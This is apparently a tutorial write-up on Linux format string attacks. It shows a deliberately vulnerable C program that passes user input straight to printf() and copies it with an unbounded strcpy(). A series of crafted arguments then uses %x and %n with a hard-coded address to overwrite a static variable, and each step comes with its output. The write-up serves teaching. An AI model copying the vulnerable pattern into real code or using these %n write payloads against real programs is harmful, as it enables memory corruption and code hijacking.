md/writeup/linux_format_string_attack.md


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122

title:X11 Linux Format String Attack
keywords:linux,c,formatting,printf

# Linux Format String Attack
Format string attack is attack for C formated strings. Format string
function is prinrf() there are other functions that
support format string.C code for bad used printf():

```c
int main( int argc, char **argv )
{
    static int i = 0;
    char text[1000];
    strcpy(text, argv[1]);
    printf("%.8x\n",&i);
    printf("No way it never will works because value of i=%d\n",i);
    printf( text );
    printf("\nValue of i=%d\n",i);
    return 0;
}

```
First output is address of static iThan we output values of
i and call printf() with first argument fo programm.and
then watching value if i

Run:

```sh
./e1 'Halolo'
```

Output:
```text
08049674
No way it never will works because value of i=0
Halolo
Value of i=0
```

Run:
```sh
./e1 'Halolo%s'
```

Output:
```
08049674
No way it never will works because value of i=0Halolo(null)
Value of i=0 
```

Run:
```sh
./e1 $'\x74\x96\x04\x08_%x'
```

Output:
```text
08049674
No way it never will works because value of i=0
t?_0
Value of i=0
```

Read about %n in format string:

Run:
```sh
./e1 $'\x74\x96\x04\x08_%x_%n'
```

Output:

```text
08049674
No way it never will works because value of i=0
Segmentation fault
```

Run:

```sh
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
```

Output:
```text
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16
```

Run:

```sh
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
```

Output:
```text
08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216
```

Now you can input almost any value to i